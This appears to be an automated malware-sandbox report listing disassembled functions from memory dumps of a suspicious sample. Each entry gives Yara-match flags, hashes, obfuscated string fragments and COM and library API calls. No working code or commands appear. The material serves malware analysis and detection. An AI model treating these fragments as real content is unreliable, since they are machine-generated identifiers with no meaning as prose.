                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                                                                                                                                                                                                                                                        • API String ID: 0-561599860
                                                                                                                                                                                                                                                                        • Opcode ID: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                                                                                                                                                                                                                                                        • Instruction ID: 2c2e9393f8b6e7a29c7aef5acce024b931fee8c6e301267b84b10251681df76c
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8313AA3150C7D08AD335CB3894583AFBBE1ABD6324F188A6DE4E9873C2D6798945CB53
                                                                                                                                                                                                                                                                        Function 00411F90 Relevance: 105.7, Strings: 83, Instructions: 1935COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                                                                                                                                                                                                                                                        • API String ID: 0-561599860
                                                                                                                                                                                                                                                                        • Opcode ID: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
                                                                                                                                                                                                                                                                        • Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57
                                                                                                                                                                                                                                                                        Function 007470DB Relevance: 44.0, Strings: 35, Instructions: 286COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                                        • API String ID: 0-168325148
                                                                                                                                                                                                                                                                        • Opcode ID: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                                        • Instruction ID: b0b2b0922e896c1852a9a7658fd3c637e0830557781a94ec9c3c70e057942b68
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2D1BE2090C7D98EDB22C77C884879DBFA15F67324F1882D8D4E96B3D2C3B94946C766
                                                                                                                                                                                                                                                                        Function 00436E74 Relevance: 44.0, Strings: 35, Instructions: 286COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                                        • API String ID: 0-168325148
                                                                                                                                                                                                                                                                        • Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                                        • Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766
                                                                                                                                                                                                                                                                        Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                                                                                                                                                                                                        • API String ID: 0-3492884535
                                                                                                                                                                                                                                                                        • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                                        • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                                                                                                                                                                                        Function 00437DF0 Relevance: 26.9, APIs: 10, Strings: 5, Instructions: 640memorycomCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                                                                                                                                                                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 004383F9
                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0043841D
                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00438423
                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                                        • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                                                                                                                                                        • API String ID: 2485776651-1397720406
                                                                                                                                                                                                                                                                        • Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                                        • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96
                                                                                                                                                                                                                                                                        Function 00423F20 Relevance: 26.0, Strings: 20, Instructions: 1038COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
                                                                                                                                                                                                                                                                        • API String ID: 0-2608794092
                                                                                                                                                                                                                                                                        • Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                                        • Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                                        Function 004241C0 Relevance: 26.0, Strings: 20, Instructions: 1025COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                                        • API String ID: 0-1300133108
                                                                                                                                                                                                                                                                        • Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                                                                                                                                                                                        • Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84
                                                                                                                                                                                                                                                                        Function 00424380 Relevance: 24.7, Strings: 19, Instructions: 948COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                                        • API String ID: 0-1893782281
                                                                                                                                                                                                                                                                        • Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                                        • Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                                        Function 00734687 Relevance: 24.2, Strings: 19, Instructions: 411COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$hi$o#M%$pIrK
                                                                                                                                                                                                                                                                        • API String ID: 0-2118368390
                                                                                                                                                                                                                                                                        • Opcode ID: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                                                                                                                                                                                                                                                        • Instruction ID: 5ac038c012190e65880c527bbcdbbde11c154e796ccfb0aaed356c1b0d7b9328
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E132FCB48463698ADBA5CF5599883CDBB71FB51304F2082D8C46D3B264DBB50BC6CF85
                                                                                                                                                                                                                                                                        Function 00748057 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 640memorycomCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 0074829B
                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0074832A
                                                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00748368
                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 007483E5
                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0074849F
                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(C7C6C5CC), ref: 0074850F
                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00748660
                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00748697
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
                                                                                                                                                                                                                                                                        • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                                                                                                                                                        • API String ID: 2775254435-1397720406
                                                                                                                                                                                                                                                                        • Opcode ID: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
                                                                                                                                                                                                                                                                        • Instruction ID: a7c12fc82487a72467efbed5b691b2b4ddffe3ca1857bce9b3b3f07ee85e1283
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A22EFB2A483508BD310DF24C884B6BBBE5EFC5704F148A2DE5959B281DB79D905CB93
                                                                                                                                                                                                                                                                        Function 00719417 Relevance: 15.4, Strings: 12, Instructions: 368COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                                                                                                                                                                                                                                                        • API String ID: 0-1290103930
                                                                                                                                                                                                                                                                        • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                                        • Instruction ID: 049a19e5800617aaf158d86ff5a6de66e5e4d35d406b4f925531bc9676f45de4
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09A1E77020C3D18BC316CF6984A07ABFFE1AF97754F1849ACE5D55B282D339894AC762
                                                                                                                                                                                                                                                                        Function 004091B0 Relevance: 15.4, Strings: 12, Instructions: 368COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                                                                                                                                                                                                                                                        • API String ID: 0-1290103930
                                                                                                                                                                                                                                                                        • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                                        • Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56
                                                                                                                                                                                                                                                                        Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                                                                                                                                                                                                                        • API String ID: 0-1763234448
                                                                                                                                                                                                                                                                        • Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                                                                                                                                                                                                                                        • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                                                                                                                                                                                                                                                        Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                                                                                                                                                                                                                                                        • API String ID: 0-1826372655
                                                                                                                                                                                                                                                                        • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                                                                                                                                                                                        • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                                                                                                                                                                                                                                        Function 0072A197 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                        • String ID: / $/,-$46
                                                                                                                                                                                                                                                                        • API String ID: 3664257935-479303636
                                                                                                                                                                                                                                                                        • Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                                        • Instruction ID: ba663aad37332a66c68e0ddfba4941604d43ac7fb8b33dbe2054f06152526d49
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CB26876648350AFE3208B95E88477BBBE2EBD5300F1CC82DE9D49B211D7799C458B93
                                                                                                                                                                                                                                                                        Function 00419F30 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: / $/,-$46
                                                                                                                                                                                                                                                                        • API String ID: 764372645-479303636
                                                                                                                                                                                                                                                                        • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                                                                                                                                                                                        • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                                                                                                                                                                                                                                        Function 0071A9E7 Relevance: 9.2, Strings: 7, Instructions: 442COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
